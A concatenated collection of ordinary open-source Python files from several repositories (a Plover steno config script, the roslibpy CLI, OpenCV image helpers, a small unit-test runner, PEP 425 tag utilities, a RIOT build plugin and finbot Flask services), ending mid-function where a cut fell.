["P-"],
],
[
"F-",
["W-"],
],
[
"*",
["H-"],
],
[
"R-",
["R-", "A-"],
],
[
"N-",
["*1"],
],
[
"L-",
["O-"],
],
[
"Y-",
["*2", "*4"],
],
[
"-O",
["*3"],
],
[
"-E",
["-E"],
],
[
"-A",
["-F"],
],
[
"-U",
["-R", "-U"],
],
[
"-I",
["-P"],
],
[
"-l",
["-B"],
],
[
"-n",
["-L"],
],
[
"-$",
["-G"],
],
[
"-D",
["-T"],
],
[
"-C",
["-S"],
],
[
"no-op",
[],
],
],
)
# Write the configuration
config.write(stdout)
```
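Because the script reads the existing configuration on stdin and writes the updated one to stdout, it can be exercised outside chezmoi by piping a `plover.cfg` through it. A minimal driver sketch (the script filename is taken from the header above; the config path is an assumption):
```python
import subprocess
from pathlib import Path

cfg_text = Path("plover.cfg").read_text()  # assumed location of the input config
result = subprocess.run(
    ["python", "modify_plover.cfg.py"],  # filename from the header above
    input=cfg_text, capture_output=True, text=True, check=True,
)
print(result.stdout)  # the rewritten configuration
```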
|
{
"source": "jeandeaual/roslibpy",
"score": 2
}
|
#### File: src/roslibpy/__main__.py
```python
import json
import roslibpy
def rostopic_list(ros, **kwargs):
for topic in ros.get_topics():
print(topic)
def rostopic_type(ros, topic, **kwargs):
topic_type = ros.get_topic_type(topic)
print(topic_type)
def rostopic_find(ros, type, **kwargs):
for topic in ros.get_topics_for_type(type):
print(topic)
def rosmsg_info(ros, type, **kwargs):
typedef = ros.get_message_details(type)
_print_type(typedef)
def rosservice_list(ros, **kwargs):
for service in ros.get_services():
print(service)
def rosservice_type(ros, service, **kwargs):
service_type = ros.get_service_type(service)
print(service_type)
def rosservice_find(ros, type, **kwargs):
for service in ros.get_services_for_type(type):
print(service)
def rossrv_info(ros, type, **kwargs):
_print_type(ros.get_service_request_details(type))
print('---')
_print_type(ros.get_service_response_details(type))
def rosservice_info(ros, service, **kwargs):
type_name = ros.get_service_type(service)
print('Type: %s\n' % type_name)
print('Message definition')
print('------------------')
rossrv_info(ros, type_name)
def rosparam_list(ros, **kwargs):
for param in ros.get_params():
print(param)
def rosparam_set(ros, param, value, **kwargs):
ros.set_param(param, json.loads(value))
def rosparam_get(ros, param, **kwargs):
print(ros.get_param(param))
def rosparam_delete(ros, param, **kwargs):
ros.delete_param(param)
def _print_typedef(typedef, def_map, level):
defs = def_map[typedef]
for fname, ftype, flen in zip(defs['fieldnames'], defs['fieldtypes'], defs['fieldarraylen']):
if flen == -1:
ftype_info = ftype
elif flen == 0:
ftype_info = ftype + '[]'
else:
ftype_info = '%s[%d]' % (ftype, flen)
print('%s%s %s' % (' ' * level, ftype_info, fname))
if ftype in def_map:
_print_typedef(ftype, def_map, level + 1)
def _print_type(typedata):
if len(typedata['typedefs']) == 0:
return
main_type = typedata['typedefs'][0]['type']
def_map = {typedef['type']: typedef for typedef in typedata['typedefs']}
_print_typedef(main_type, def_map, 0)
def main():
import argparse
parser = argparse.ArgumentParser(description='roslibpy command-line utility')
commands = parser.add_subparsers(help='commands')
# Command: topic
topic_command = commands.add_parser('topic', help='ROS Topics')
topic_subcommands = topic_command.add_subparsers(help='ROS topic commands')
topic_list_parser = topic_subcommands.add_parser('list', help='List available ROS topics')
topic_list_parser.set_defaults(func=rostopic_list)
topic_type_parser = topic_subcommands.add_parser('type', help='ROS topic type')
topic_type_parser.add_argument('topic', action='store', type=str, help='Topic name')
topic_type_parser.set_defaults(func=rostopic_type)
topic_find_parser = topic_subcommands.add_parser('find', help='ROS topics by type')
topic_find_parser.add_argument('type', action='store', type=str, help='Type name')
topic_find_parser.set_defaults(func=rostopic_find)
# Command: msg
msg_command = commands.add_parser('msg', help='ROS Message type information')
msg_subcommands = msg_command.add_subparsers(help='ROS Message type commands')
msg_info_parser = msg_subcommands.add_parser('info', help='ROS message type information')
msg_info_parser.add_argument('type', action='store', type=str, help='Message type')
msg_info_parser.set_defaults(func=rosmsg_info)
# Command: service
service_command = commands.add_parser('service', help='ROS Services')
service_subcommands = service_command.add_subparsers(help='ROS service commands')
service_list_parser = service_subcommands.add_parser('list', help='List available ROS services')
service_list_parser.set_defaults(func=rosservice_list)
service_type_parser = service_subcommands.add_parser('type', help='ROS service type')
service_type_parser.add_argument('service', action='store', type=str, help='Service name')
service_type_parser.set_defaults(func=rosservice_type)
service_find_parser = service_subcommands.add_parser('find', help='ROS services by type')
service_find_parser.add_argument('type', action='store', type=str, help='Type name')
service_find_parser.set_defaults(func=rosservice_find)
service_info_parser = service_subcommands.add_parser('info', help='ROS service information')
service_info_parser.add_argument('service', action='store', type=str, help='Service name')
service_info_parser.set_defaults(func=rosservice_info)
# Command: srv
srv_command = commands.add_parser('srv', help='ROS Service type information')
srv_subcommands = srv_command.add_subparsers(help='ROS service type commands')
srv_info_parser = srv_subcommands.add_parser('info', help='ROS service type information')
srv_info_parser.add_argument('type', action='store', type=str, help='Service type')
srv_info_parser.set_defaults(func=rossrv_info)
# Command: param
param_command = commands.add_parser('param', help='ROS Params')
param_subcommands = param_command.add_subparsers(help='ROS parameter commands')
param_list_parser = param_subcommands.add_parser('list', help='List available ROS parameters')
param_list_parser.set_defaults(func=rosparam_list)
param_set_parser = param_subcommands.add_parser('set', help='Set ROS param value')
param_set_parser.add_argument('param', action='store', type=str, help='Param name')
param_set_parser.add_argument('value', action='store', type=str, help='Param value')
param_set_parser.set_defaults(func=rosparam_set)
param_get_parser = param_subcommands.add_parser('get', help='Get ROS param value')
param_get_parser.add_argument('param', action='store', type=str, help='Param name')
param_get_parser.set_defaults(func=rosparam_get)
param_delete_parser = param_subcommands.add_parser('delete', help='Delete ROS param')
param_delete_parser.add_argument('param', action='store', type=str, help='Param name')
param_delete_parser.set_defaults(func=rosparam_delete)
# Invoke
ros = roslibpy.Ros('localhost', 9090)
try:
ros.run()
args = parser.parse_args()
args.func(ros, **vars(args))
finally:
ros.terminate()
if __name__ == '__main__':
main()
```
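Each subcommand above is a thin wrapper over the `roslibpy.Ros` client, so the same queries can be issued programmatically. A minimal sketch (assumes a rosbridge server listening on localhost:9090):
```python
import roslibpy

ros = roslibpy.Ros('localhost', 9090)
ros.run()
try:
    # Same calls that back `topic list` and `topic type` above
    for topic in ros.get_topics():
        print(topic, '->', ros.get_topic_type(topic))
finally:
    ros.terminate()
```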
#### File: roslibpy/tests/test_tf.py
```python
import helpers
from roslibpy import Ros
from roslibpy.tf import TFClient
def run_tf_test():
context = {'counter': 0}
ros_client = Ros('127.0.0.1', 9090)
tf_client = TFClient(ros_client, fixed_frame='world')
def callback(message):
assert message['translation'] == dict(x=0.0, y=0.0, z=0.0), 'Unexpected translation received'
assert message['rotation'] == dict(x=0.0, y=0.0, z=0.0, w=1.0), 'Unexpected rotation received'
context['counter'] += 1
ros_client.terminate()
tf_client.subscribe(frame_id='/world', callback=callback)
ros_client.call_later(2, ros_client.terminate)
ros_client.run_forever()
assert context['counter'] > 0
def test_tf_test():
helpers.run_as_process(run_tf_test)
if __name__ == '__main__':
import logging
logging.basicConfig(
level=logging.INFO, format='[%(thread)03d] %(asctime)-15s [%(levelname)s] %(message)s')
run_tf_test()
```
|
{
"source": "jeandemeusy/jdu_args",
"score": 2
}
|
#### File: jdu_args/jduargs/result.py
```python
class Result:
"""Class description."""
def __init__(self):
"""
Initialization of the class.
"""
pass
def __str__(self):
    return ""  # __str__ must return a str; empty placeholder until implemented
```
|
{
"source": "jeandemeusy/jdu_image",
"score": 3
}
|
#### File: jdu_image/jduimage/_generalMixin.py
```python
import cv2 as cv
import numpy as np
from typing import List, Tuple, Union
class GeneralMixin:
def channel(self, c: int) -> None:
"""Selects one channel among the image's.
Parameters
----------
c : int
Channels index to access
"""
if self.dim != 2:
channels = cv.split(self.data)
self.data = channels[c]
def split(self, direction: str = "h", position: int or str = "mid") -> None:
"""Split the image.
Parameters
----------
direction: {"h","horizontal","v","vertical"}
split direction
position int or str
index where to split, or "mid" if the split has to be centered (default is "mid")
"""
if direction not in ["h", "horizontal", "v", "vertical"]:
raise ValueError("Wrong orientation")
tl1 = [0, 0]
br2 = [self.height, self.width]
if direction in ["h", "horizontal"]:
if position == "mid":
position = self.height // 2
br1 = [position, self.width]
tl2 = [position, 0]
if direction in ["v", "vertical"]:
if position == "mid":
position = self.width // 2
br1 = [self.height, position]
tl2 = [0, position]
first = self.crop(tl1, br1, False)
secon = self.crop(tl2, br2, False)
return first, secon
def negate(self) -> None:
"""Inverts the image. Only works on 2D images."""
if self.dim != 2:
raise ValueError("Negation only on 2D images")
self.data = ~self.data
def blur(self, size: int = 5, method: str = "gauss") -> None:
"""Blurs the image. The method and filter size can be chosen.
Parameters
----------
size : int, optional
Size of the filter (default is 5)
method: { "gauss", "average", "median","bilateral"}
Blurring methods
"""
if method not in ["gauss", "average", "median", "bilateral"]:
raise ValueError("Unexpected method")
if size < 3:
raise ValueError("Size too small, must be bigger than 3.")
if size % 2 == 0:
raise ValueError("Size must be odd")
if method == "gauss":
self.data = cv.GaussianBlur(self.data, (size, size), 0)
elif method == "average":
self.data = cv.blur(self.data, (size, size))
elif method == "median":
self.data = cv.medianBlur(self.data, size)
elif method == "bilateral":
self.data = cv.bilateralFilter(self.data, size, 100, 100)
def gaussian_blur(self, size: int, sigma: float) -> None:
"""Applies gaussian blur to the image.
Parameters
---------
size: int
size of the kernel
sigma: float
standard deviation of the kernel
"""
self.data = cv.GaussianBlur(self.data, (size, size), sigma)
def resize(self, param: str, value: float, inter: int = cv.INTER_AREA) -> None:
"""Resizes the image. When changing height (respectively width), width (respectively height) change so that the ratio stays the same.
Parameters
----------
param: { "height", "width", "ratio" }
Which output dimensions will be set
value: float
Output dimensions specified by param value
inter: int
Interpolation method (default is cv.INTER_AREA)
"""
if param not in ["width", "height", "ratio"]:
raise ValueError("Unexpected parameter")
if value <= 0:
raise ValueError("Value must be bigger than 0")
dim = None
(h, w) = self.shape[:2]
if param == "height":
r = int(value) / float(h)
dim = (int(w * r), int(value))
elif param == "width":
r = int(value) / float(w)
dim = (int(value), int(h * r))
elif param == "ratio":
dim = (int(w * value), int(h * value))
else:
dim = (w, h)
self.data = cv.resize(self.data, dim, interpolation=inter)
def full_resize(self, dim: List[int], inter: int = cv.INTER_AREA) -> None:
"""Resize the image to the given dimensions, without keeping aspect ratio.
Parameters
----------
dim: list of int
Desired image dimensions
inter: int
openCV interpolation method (default is cv.INTER_AREA)
"""
self.data = cv.resize(self.data, dim, interpolation=inter)
def rotate90(self):
"""rotate the image at 90degrees clockwise"""
self.data = cv.rotate(self.data, cv.ROTATE_90_CLOCKWISE)
def rotate(self, angle: float, center: List[int]):
"""Rotate the image wtha given angle.
Parameters
----------
angle: float
Angle of rotation in degrees
center: list of int
(x,y) rotation center coordinate
"""
rot_mat = cv.getRotationMatrix2D(center, 1.0 * angle, 1.0)
self.data = cv.warpAffine(
self.data, rot_mat, self.shape[1::-1], flags=cv.INTER_NEAREST
)
def equalize_hist(self, rate: float) -> None:
"""Equalizes the histogram of intensities of the image. It increases the contrast of the image. Only works on 2D images.
Parameters
----------
rate: float
Proportion of the histogram to remove to the left and right
"""
if self.dim != 2:
raise ValueError("Equalize only on 2D images")
self.data = cv.equalizeHist(self.data.astype(np.uint8))
hist = np.cumsum(np.histogram(self.data, 255)[0])
lowest_value = np.where((rate * hist[-1]) <= hist)[0][0]
highest_value = np.where(((1 - rate) * hist[-1]) >= hist)[0][-1]
self.data[self.data < lowest_value] = lowest_value
self.data[self.data > highest_value] = highest_value
def distance_transform(self) -> None:
"""Computes distances transformation, i.e. for each black pixel, computes the shortest distances to a white pixel. Only works on 2D images."""
if self.dim != 2:
raise ValueError("Distance transform only on 2D images")
self.data = cv.distanceTransform(self.data, cv.DIST_L2, 3)
cv.normalize(self.data, self.data, 0, 1, cv.NORM_MINMAX)
self.data = np.uint8(self.data * 255)
```
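All of these operations mutate the instance in place and rely on the attributes provided by `ImageStructure` below. A short usage sketch, assuming a concrete `Image` class that combines the two (the class name and file path are assumptions, not taken from the package):
```python
img = Image("photo.jpg")           # hypothetical mixin composition, see below
img.resize("width", 640)           # keeps aspect ratio
top, bottom = img.split("h")       # split horizontally at the midpoint
top.blur(size=5, method="gauss")   # in-place Gaussian blur on the top half
```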
#### File: jdu_image/jduimage/_imageStructure.py
```python
import cv2 as cv
import numpy as np
from typing import Union, List
from pathlib import Path
class ImageStructure:
"""General purpose high level opencv image class. All operation on instances are inplace."""
def __init__(self, input: Union[str, np.ndarray]):
"""Initialisation of the class.
Parameters
----------
input : str, np.ndarray
Either the path to an image file, or a numpy array.
"""
if not isinstance(input, str) and not isinstance(input, np.ndarray):
raise TypeError("Bad type")
if isinstance(input, str):
self.data = self.__load_image(input)
elif isinstance(input, np.ndarray):
self.data = self.__convert_array(input)
@property
def shape(self) -> List[int]:
"""Shape of the image."""
return self.data.shape
@property
def width(self) -> int:
"""Width of the image"""
return self.shape[1]
@property
def height(self) -> int:
"""Height of the image"""
return self.shape[0]
@property
def dim(self) -> int:
"""Number of dimensions of the image."""
return len(self.shape)
def __load_image(self, path: str) -> np.ndarray:
"""Loads the image from a file, as a color image (BGR).
Parameters
----------
path: str
path to input image
Returns
-------
np.ndarray
Loaded image
"""
if not Path(path).exists():
raise ValueError(f"image at {path} not found")
return cv.imread(path, cv.IMREAD_COLOR)
def __convert_array(self, array: np.ndarray) -> np.ndarray:
"""Converts an array. For the moments only checks the array type and returns it.
Parameters
----------
array: np.ndarray
Input array
Returns
-------
np.ndarray
Converted array
"""
if not isinstance(array, np.ndarray):
raise TypeError("Wrong image type for conversion")
return array
```
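`ImageStructure` holds the pixel data and shape properties while the mixins contribute behaviour; a plausible composition (the concrete class name is an assumption):
```python
class Image(GeneralMixin, MorphologicalMixin, OutputMixin, ImageStructure):
    """Hypothetical aggregate combining the mixins defined in this package."""
    pass

img = Image("input.png")
print(img.width, img.height, img.dim)
```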
#### File: jdu_image/jduimage/_morphologicalMixin.py
```python
import cv2 as cv
import numpy as np
from typing import Tuple
class MorphologicalMixin:
def sharpen(self) -> None:
"""Sharpens the image with 3x3 filter. Only works on 2D images."""
if self.dim != 2:
raise ValueError("Only on 2D images")
filter = np.array([[-1, -1, -1], [-1, 9, -1], [-1, -1, -1]])
self.data = cv.filter2D(self.data, -1, filter)
def open(self, size: Tuple[int, int] = (5, 5), element: int = cv.MORPH_ELLIPSE) -> None:
"""Performs morphological opening on the image. Only works on 2D images.
Parameters
----------
size: Tuple[int, int], optional
Size of the kernel (default is (5, 5))
element: int, optional
Structural element (default is cv.MORPH_ELLIPSE)
"""
if self.dim != 2:
raise ValueError("Only on 2D images")
kernel = cv.getStructuringElement(element, size)
self.data = cv.morphologyEx(self.data, cv.MORPH_OPEN, kernel)
def close(self, size: Tuple[int, int] = (5, 5), element: int = cv.MORPH_ELLIPSE) -> None:
"""Performs morphological closing on the image. Only works on 2D images.
Parameters
----------
size: Tuple[int, int], optional
    Size of the kernel (default is (5, 5))
element: int, optional
Structural element (default is cv.MORPH_ELLIPSE)
"""
if self.dim != 2:
raise ValueError("Only on 2D images")
kernel = cv.getStructuringElement(element, size)
self.data = cv.morphologyEx(self.data, cv.MORPH_CLOSE, kernel)
def dilate(self, size: Tuple[int, int] = (5, 5), element: int = cv.MORPH_ELLIPSE) -> None:
"""Performs morphological dilatation on the image. Only works on 2D images.
Parameters
----------
size: Tuple[int, int], optional
Size of the kernel (default is (5, 5))
element: int, optional
Structural element (default is cv.MORPH_ELLIPSE)
"""
if self.dim != 2:
raise ValueError("Only on 2D images")
kernel = cv.getStructuringElement(element, size)
self.data = cv.morphologyEx(self.data, cv.MORPH_DILATE, kernel)
def erode(self, size: Tuple[int, int] = (5, 5), element: int = cv.MORPH_ELLIPSE) -> None:
"""Performs morphological erosion on the image. Only works on 2D images.
Parameters
----------
size: Tuple[int, int], optional
Size of the kernel (default is (5,5))
element: int, optional
Structural element (default is cv.MORPH_ELLIPSE)
"""
if self.dim != 2:
raise ValueError("Only on 2D images")
kernel = cv.getStructuringElement(element, size)
self.data = cv.morphologyEx(self.data, cv.MORPH_ERODE, kernel)
def tophat(self, size: int = 5, element: int = cv.MORPH_ELLIPSE) -> None:
"""Performs morphological tophat on the image. Only works on 2D images.
Parameters
----------
size: int, optional
Size of the kernel (default is 5)
element: int, optional
Structural element (default is cv.MORPH_ELLIPSE)
"""
if self.dim != 2:
raise ValueError("Only on 2D images")
kernel = cv.getStructuringElement(element, (size, size))
self.data = cv.morphologyEx(self.data, cv.MORPH_TOPHAT, kernel)
def algebric_open(self, size: int = 5, step: int = 5) -> None:
"""Performs morphological algebric opening on the image. Only works on 2D images.
Parameters
----------
size: int, optional
Structural element size
step: int, optional
Angle step
"""
if self.dim != 2:
raise ValueError("Only on 2D images")
result = np.zeros(self.shape, dtype=np.uint8)
for a in range(0, 180, step):
kernel = line_strel(size=size, angle=a)
temp = cv.morphologyEx(self.data, cv.MORPH_OPEN, kernel).astype(np.uint8)
result = np.maximum(result, temp)
self.data = result
def algebric_dilate(self, size: int = 5, step: int = 5) -> None:
"""Performs morphological algebric dilatation on the image. Only works on 2D images.
Parameters
----------
size: int, optional
Structural element size
step: int, optional
Angle step
"""
if self.dim != 2:
raise ValueError("Only on 2D images")
result = np.zeros(self.shape, dtype=np.uint8)
for a in range(0, 180, step):
kernel = line_strel(size=size, angle=a)
temp = cv.morphologyEx(self.data, cv.MORPH_DILATE, kernel).astype(np.uint8)
result = np.maximum(result, temp)
self.data = result
def blackhat(self, size: int = 5, element: int = cv.MORPH_ELLIPSE) -> None:
"""Performs morphological blackhat on the image. Only works on 2D images.
Parameters
----------
size: int, optional
Size of the kernel (default is 5)
element: int, optional
Structural element (default is cv.MORPH_ELLIPSE)
"""
if self.dim != 2:
raise ValueError("Only on 2D images")
kernel = cv.getStructuringElement(element, (size, size))
self.data = cv.morphologyEx(self.data, cv.MORPH_BLACKHAT, kernel)
def gabor(self) -> None:
"""Applies gabor filter to the image."""
ksize = 21
thetas = [-45]
filters = []
for a in thetas:
kernel = cv.getGaborKernel([ksize, ksize], 40, a, 25, 1)
filters.append(kernel)
result = np.zeros(self.shape, dtype=np.uint8)
for kernel in filters:
imgfiltered = cv.filter2D(self.data, -1, kernel)
result = np.maximum(result, imgfiltered)
self.data = result
def edges(self, thres1: int = 100, thres2: int = 200) -> None:
"""Finds the edges on the image with Canny algorithm.
Parameters
----------
thres1: int, optional
Low threshold (default is 100)
thres2: int, optional
High threshold (default is 200)
"""
self.data = cv.Canny(image=self.data, threshold1=thres1, threshold2=thres2)
def sobel(self) -> None:
self.data = cv.Sobel(src=self.data, ddepth=cv.CV_8UC1, dx=1, dy=1, ksize=3)
def line_strel(size: int, angle: float) -> np.ndarray:
"""Creates a linear structural element, with given length and rotation angle.
Parameters
----------
size: int
Length of the structural element when laying flat
angle: float
Rotation angle of the line in degrees
Returns
-------
np.ndarray
Square array containing the linear structural element
"""
if size % 2 != 1:
raise ValueError("Size must be odd")
line = np.zeros((size, size))
line[size // 2, :] = 1
center = (size // 2, size // 2)
tform = cv.getRotationMatrix2D(center, angle, 1)
kernel = cv.warpAffine(line, tform, line.shape)
return (kernel * 255).astype(np.uint8)
```
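`line_strel` underpins the algebraic open/dilate loops above, and is easy to sanity-check in isolation:
```python
kernel = line_strel(size=5, angle=45)
print(kernel.shape)              # (5, 5)
print((kernel > 0).astype(int))  # the rotated line as a 0/1 mask
```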
#### File: jdu_image/jduimage/_outputMixin.py
```python
import cv2 as cv
from pathlib import Path
class OutputMixin:
def show(self, label: str = "", height: int = 0, width: int = 0) -> None:
"""Displays the image to the screen.
Parameters
----------
label: str, optional
Title of the window
height: int, optional
Height of the image for display (default is 0)
width: int, optional
Width of the image for display (default is 0)
"""
display = self.deepcopy()
if height != 0:
display.resize("height", height)
elif width != 0:
display.resize("width", width)
cv.imshow(label, display.data)
cv.waitKey(0)
def save(self, path: str) -> None:
"""
Saves the image to a file. All folder creation is handled by the method.
Parameters
----------
path: str
Path to output image. Can be absolute or relative. Recognised file types are {"jpg","jpeg","png"}
"""
if path.split(".")[-1] not in ["jpg", "jpeg", "png"]:
raise ValueError("Unrecognised image file type")
folder = "."
substrings = path.replace("\\", "/").split("/")
folder = "/".join(substrings[0:-1])
if folder and not Path(folder).exists():
Path(folder).mkdir(parents=True, exist_ok=True)
cv.imwrite(path, self.data)
```
|
{
"source": "jeandemeusy/jdu_unit",
"score": 2
}
|
#### File: jdu_unit/jduunit/unittest.py
```python
from .testcase import TestCase
import inspect, time
from pathlib import Path
import sys, subprocess
from jduargs import ArgumentParser
class TestProgram:
def __init__(self, module: str = "__main__"):
if type(module) == type(""):
self.module = __import__(module)
for part in module.split(".")[1:]:
self.module = getattr(self.module, part)
else:
self.module = module
if len(sys.argv) > 1:
self.verbose = sys.argv[1] == "-d"
else:
self.verbose = False
self.prefix = "test_"
self.classes = inspect.getmembers(self.module, inspect.isclass)
self.filename = Path(self.module.__file__).name
self.own_methods = [f for f in dir(TestCase) if callable(getattr(TestCase, f))]
self._run_tests()
def _run_tests(self):
n_methods = 0
n_fails = 0
start_t = time.time()
for c in self.classes:
class_name = c[0]
class_address = c[1]
methods = self._get_class_methods(class_address)
print(f"from {class_name} ({self.filename})")
max_len = max((len(m) for m in methods), default=len(self.prefix)) - len(self.prefix)
n_methods += len(methods)
for m in methods:
try:
getattr(class_address(), m)()
except AssertionError as err:
error_str = f"({err})"
else:
error_str = ""
res_str, short = self._handle_error(error_str)
n_fails += error_str != ""
if self.verbose:
print(f" {m[5:]:{max_len}s} ... {res_str} {error_str}")
else:
print(short, end="")
end_t = time.time()
if not self.verbose:
print("")
print("-" * 60)
print(f"Ran {n_methods} tests in {end_t-start_t:.3f}s")
if n_fails == 0:
print("\033[32m\033[1mSUCCESS\033[0m\n")
else:
print(f"\033[31m\033[1mFAILED (failures={n_fails})\033[0m\n")
def _get_class_methods(self, class_address):
return [
func
for func in dir(class_address)
if callable(getattr(class_address, func))
and func.startswith(self.prefix)
and func not in self.own_methods
]
def _handle_error(self, err_str):
if err_str != "":
res_str = "fail"
short = "x"
else:
res_str = "ok"
short = "."
return res_str, short
main = TestProgram
if __name__ == "__main__":
parser = ArgumentParser("Performs unit tests inside test_*.py files.")
parser.add("display", "d", bool, False, help="Increase level of verbosity")
parser.add("path", "p", str, False, help="Folder containing test_*.py files")
parser.compile(sys.argv[1:])
p = Path(parser["path"]).glob("*.py")
files = [x for x in p if x.is_file() and x.stem[:5] == "test_"]
verbose_str = "-d" if parser["display"] else ""
for file in files:
subprocess.call(f"python {file} {verbose_str}")
```
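A test module consumed by this runner mirrors the standard-library layout; a minimal sketch (the module name and import paths are assumptions based on the package structure above):
```python
# test_math.py -- hypothetical module discovered by the runner above
from jduunit.testcase import TestCase
from jduunit import unittest

class MathTest(TestCase):
    def test_addition(self):
        assert 1 + 1 == 2, "addition is broken"

if __name__ == "__main__":
    unittest.main()  # TestProgram collects the test_* methods above
```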
|
{
"source": "jeandet/mesonpep517",
"score": 2
}
|
#### File: mesonpep517/mesonpep517/pep425tags.py
```python
import distutils.util
import platform
import sys
import sysconfig
import warnings
def get_abbr_impl():
"""Return abbreviated implementation name."""
impl = platform.python_implementation()
if impl == "PyPy":
return "pp"
elif impl == "Jython":
return "jy"
elif impl == "IronPython":
return "ip"
elif impl == "CPython":
return "cp"
raise LookupError("Unknown Python implementation: " + impl)
def get_abi_tag():
"""Return the ABI tag based on SOABI (if available) or emulate SOABI
(CPython 2, PyPy)."""
soabi = get_config_var("SOABI")
impl = get_abbr_impl()
if not soabi and impl in ("cp", "pp") and hasattr(sys, "maxunicode"):
d = ""
m = ""
u = ""
precond = impl == "cp"
if get_flag("Py_DEBUG", hasattr(sys, "gettotalrefcount"), warn=precond):
d = "d"
precond = impl == "cp" and sys.version_info < (3, 3)
if sys.version_info < (3, 8) and get_flag(
"WITH_PYMALLOC", (impl == "cp"), warn=precond
):
m = "m"
precond = impl == "cp" and sys.version_info < (3, 8)
if sys.version_info < (3, 3) and get_flag(
"Py_UNICODE_SIZE",
(sys.maxunicode == 0x10FFFF),
expected=4,
warn=precond,
):
u = "u"
abi = "%s%s%s%s%s" % (impl, get_impl_ver(), d, m, u)
elif soabi and soabi.startswith("cpython-"):
abi = "cp" + soabi.split("-")[1]
elif soabi:
abi = soabi.replace(".", "_").replace("-", "_")
else:
abi = None
return abi
def get_config_var(var, default=None):
"""Return value of given sysconfig variable or given default value, if it
is not set."""
try:
return sysconfig.get_config_var(var)
except IOError as e: # pip Issue #1074
warnings.warn("{0}".format(e), RuntimeWarning)
return default
def get_flag(var, fallback, expected=True, warn=True):
"""Use a fallback method for determining SOABI flags if the needed config
var is unset or unavailable."""
val = get_config_var(var)
if val is None:
if warn:
warnings.warn(
"Config variable '{0}' is unset, Python ABI tag may "
"be incorrect".format(var),
RuntimeWarning,
2,
)
return fallback
return val == expected
def get_impl_ver():
"""Return implementation version."""
impl_ver = get_config_var("py_version_nodot")
if not impl_ver:
impl_ver = "{}{}".format(*sys.version_info[:2])
return impl_ver
def get_platform_tag():
"""Return the PEP-425 compatible platform tag."""
return distutils.util.get_platform().replace("-", "_").replace(".", "_")
```
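Combining these helpers yields the compressed PEP 425 tag used in wheel filenames; for example:
```python
impl_tag = "{}{}".format(get_abbr_impl(), get_impl_ver())   # e.g. "cp311"
full_tag = "-".join([impl_tag, get_abi_tag() or "none", get_platform_tag()])
print(full_tag)  # e.g. "cp311-cp311-linux_x86_64" (varies by interpreter)
```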
|
{
"source": "jeandouglasdealmeida/python_tdd_tarefa",
"score": 4
}
|
#### File: jeandouglasdealmeida/python_tdd_tarefa/5.py
```python
import unittest
class Area():
def quadrada(self):
return self.lado1 * self.lado2
def cubica(self):
return self.lado1 * self.lado2 * self.lado3
class MyCalcTest(unittest.TestCase):
def testAreaQuadrada(self):
area = Area()
area.lado1 = 3
area.lado2 = 9
self.assertEqual(27, area.quadrada())
def testAreaCubica(self):
area = Area()
area.lado1 = 3
area.lado2 = 6
area.lado3 = 2
self.assertEqual(36, area.cubica())
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "jeandudey/riotgear",
"score": 2
}
|
#### File: plugins/builder/plugin.py
```python
from riotgear.plugin import BasePlugin
import subprocess
import multiprocessing # CPU count
import os
from pathlib import Path
class BuildPlugin(BasePlugin):
def __init__(self,
board=None,
application=None,
jobs=None,
docker=False):
self.board = board
if application is not None:
app_path = Path(application)
else:
app_path = Path.cwd()
if not self._is_application(app_path):
    # print-and-return would leave the plugin half-constructed and make
    # entry() fail later with an opaque AttributeError
    raise RuntimeError(f"No RIOT application (Makefile) found in {app_path}")
self.application = app_path
core_count = multiprocessing.cpu_count()
self.jobs = jobs if jobs is not None else core_count
self.use_docker = docker
def _is_application(self, path):
makefile = path / "Makefile"
return makefile.is_file()
def entry(self):
call_args = ['BOARD={}'.format(self.board)]
call_args.append("-j{}".format(self.jobs))
if self.use_docker:
call_args.append("BUILD_IN_DOCKER=1")
call_args.append("DOCKER_MAKE_ARGS=-j{}".format(self.jobs))
self.build(call_args)
def build(self, call_args):
call = ['make', 'all']
call.extend(call_args)
subprocess.call(call, cwd=self.application)
```
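Outside the plugin machinery, the builder can be driven directly; a short sketch (the board name is only an example):
```python
plugin = BuildPlugin(board="native", jobs=4, docker=False)
plugin.entry()  # runs `make all BOARD=native -j4` in the application directory
```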
|
{
"source": "jean-edouard-boulanger/finbot",
"score": 2
}
|
#### File: appwsrv/blueprints/base.py
```python
from finbot.core.web_service import Route
from finbot.core import environment
from flask import Blueprint
API_V1 = Route("/api/v1")
base_api = Blueprint("api", __name__)
@base_api.route(API_V1.healthy(), methods=["GET"])
def healthy():
return {"healthy": True}
@base_api.route(API_V1.system_report(), methods=["GET"])
def get_system_report():
return {
"system_report": {
"finbot_version": "0.0.1",
"runtime": environment.get_finbot_runtime(),
}
}
```
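The `Route` helper composes endpoint paths from attribute access, so both endpoints can be probed over plain HTTP; a sketch (host and port are assumptions):
```python
import requests

base = "http://localhost:5003/api/v1"  # assumed appwsrv host/port
print(requests.get(f"{base}/healthy").json())        # {"healthy": True}
print(requests.get(f"{base}/system_report").json())  # finbot version + runtime
```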
#### File: apps/snapwsrv/snapwsrv.py
```python
from finbot.apps.snapwsrv.schema import (
TakeSnapshotRequest,
TakeSnapshotResponse,
SnapshotResultsCount,
SnapshotSummary,
)
from finbot.clients.finbot import FinbotClient, LineItem
from finbot.providers.plaid_us import pack_credentials as pack_plaid_credentials
from finbot.core import secure, utils, fx_market, tracer, environment
from finbot.core.utils import unwrap_optional, format_stack
from finbot.core.db.session import Session
from finbot.core.logging import configure_logging
from finbot.core.web_service import service_endpoint, ApplicationErrorData
from finbot.core.serialization import pretty_dump
from finbot.model import (
UserAccount,
UserAccountSnapshot,
SnapshotStatus,
LinkedAccount,
LinkedAccountSnapshotEntry,
SubAccountSnapshotEntry,
SubAccountItemSnapshotEntry,
SubAccountItemType,
XccyRateSnapshotEntry,
)
from flask import Flask
from flask_pydantic import validate
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker, joinedload
from concurrent.futures import ThreadPoolExecutor
from decimal import Decimal
from dataclasses import dataclass
from typing import Optional, Tuple, Any
from copy import deepcopy
import logging
import json
FINBOT_ENV = environment.get()
configure_logging(FINBOT_ENV.desired_log_level)
db_engine = create_engine(FINBOT_ENV.database_url)
db_session = Session(scoped_session(sessionmaker(bind=db_engine)))
tracer.configure(
identity="snapwsrv", persistence_layer=tracer.DBPersistenceLayer(db_session)
)
app = Flask(__name__)
@app.teardown_appcontext
def cleanup_context(*args, **kwargs):
db_session.remove()
class SnapshotTreeVisitor(object):
def visit_account(self, account, errors):
pass
def visit_sub_account(self, account, sub_account, balance):
pass
def visit_item(self, account, sub_account, item_type, item):
pass
def visit_snapshot_tree(raw_snapshot, visitor):
